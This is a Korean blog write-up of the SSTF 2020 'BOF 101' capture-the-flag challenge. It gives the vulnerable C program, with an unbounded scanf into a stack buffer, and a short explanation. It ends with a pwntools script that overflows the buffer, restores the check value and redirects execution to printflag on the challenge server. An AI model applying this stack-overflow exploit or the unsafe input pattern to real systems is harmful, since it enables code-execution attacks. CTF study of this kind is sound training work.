[SSTF 2020] BOF 101 Writeup

Writeup/SSTF 2020
2020. 8. 18. 17:50

Analysis

checksec

bof101.c

#include <stdio.h>
//#include <fcntl.h>
//#include <unistd.h>
#include <stdlib.h>
#include <string.h>

void printflag(){ 
	char buf[32];
	FILE* fp = fopen("/flag", "r"); 
	fread(buf, 1, 32, fp);
	fclose(fp);
	printf("%s", buf);
	fflush(stdout);
}

int main() {
	int check=0xdeadbeef;
	char name[140];
	printf("printflag()'s addr: %p\n", &printflag);
	printf("What is your name?\n: ");
	fflush(stdout);
	scanf("%s", name);	
	if (check != 0xdeadbeef){
		printf("[Warning!] BOF detected!\n");
		fflush(stdout);
		exit(0);
	}
	return 0;
}

Disassemble

%s로 name에다가 입력을 받으니 BOF가 가능하다.

또한, BOF를 감지하는 변수인 check를 0xdeafbeef로 덮어서 우회해주고 ret를 printflag의 주소로 덮어주면 간단하게 풀릴 것이다.

Exploit

exploit.py

from pwn import *

p = remote("bof101.sstf.site", 1337)

p.recvuntil("printflag()'s addr: ")
leak = int(p.recv(14), 16)

payload = str()
payload += 'A' * (0x90 - 0x4)
payload += p32(0xDEADBEEF) # check
payload += 'A' * 8 # sfp
payload += p64(leak) # ret

p.sendlineafter("What is your name?\n", payload)

p.interactive()

일	월	화	수	목	금	토
	1	2	3	4	5	6
7	8	9	10	11	12	13
14	15	16	17	18	19	20
21	22	23	24	25	26	27
28	29	30

n1net4il

[SSTF 2020] BOF 101 Writeup

Analysis

Exploit

Copyright © n1net4il All Rights Reserved

Analysis

Exploit

Copyright © n1net4il All Rights Reserved

티스토리툴바